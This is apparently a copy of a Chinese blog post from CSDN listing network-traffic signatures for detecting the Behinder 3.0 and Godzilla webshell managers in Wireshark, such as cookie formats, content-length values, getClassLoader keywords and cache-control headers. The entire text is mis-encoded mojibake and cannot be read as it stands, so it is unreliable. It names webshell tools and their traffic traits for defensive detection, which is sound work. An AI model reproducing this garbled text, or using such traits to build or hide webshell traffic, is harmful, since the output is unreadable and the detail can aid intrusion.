µÚÒ»½×¶ÎÇëÇóÖзµ»Ø°üµÄ״̬ÂëÊÇ200£¬£¬·µ»ØÄÚÈÝÊÇ16λµÄÃÜÔ¿¡£¡£¡£¡£¡£½¨ÉèÅþÁ¬ºóµÄcookieÃûÌö¼ÊÇCookie£ºPHPSessid=xxxx £»£»£»£»£»path=/£»£»£»£»£»ÌØÕ÷¡£¡£¡£¡£¡£
±ùЫ3.0
ÇëÇó°üÖеÄconten-length×Ö¶ÎÊÇ5740»òÕß5720£¬£¬È»ºóÇëÇóÍ·Ò²¾ßÓÐÌØÕ÷ÐÅÏ¢£¬£¬²»¹ýÕâ¸ö½ÏÁ¿³¤£¬£¬Ã»ÓмÇ×Å¡£¡£¡£¡£¡£
¸ç˹À
1.jsp´úÂëÖпÉÄÜ»á¾ßÓÐgetclass£¬£¬getclassLoaderµÈÒªº¦×Ö£¬£¬payloadʹÓÃbase64±àÂëµÈÌØÕ÷¡£¡£¡£¡£¡£phpºÍaspÔòÊÇͨË×µÄÒ»¾ä»°Ä¾Âí¡£¡£¡£¡£¡£
2.ÔÚÏìÓ¦°üµÄcache-control×Ö¶ÎÖÐÓÐno-store£¬£¬no-cacheµÈÌØÕ÷¡£¡£¡£¡£¡£
3.ËùÓÐÇëÇóÖеÄcookie×Ö¶Î×îºóÃæ¶¼±£´æ£»£»£»£»£»ÌØÕ÷
¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª
×÷ÕߣºÈȰ®»¼Ò·òÈË
ÔÎÄÁ´½Ó£ºhttps://blog.csdn.net/zlloveyouforever/article/details/125174473
- Òªº¦´Ê±êÇ©£º
- ¹¤¾ßɨÃè wiresharkÍøÂç·â°üÆÊÎö¹¤¾ß

¾©¹«Íø°²±¸ 11010802026257ºÅ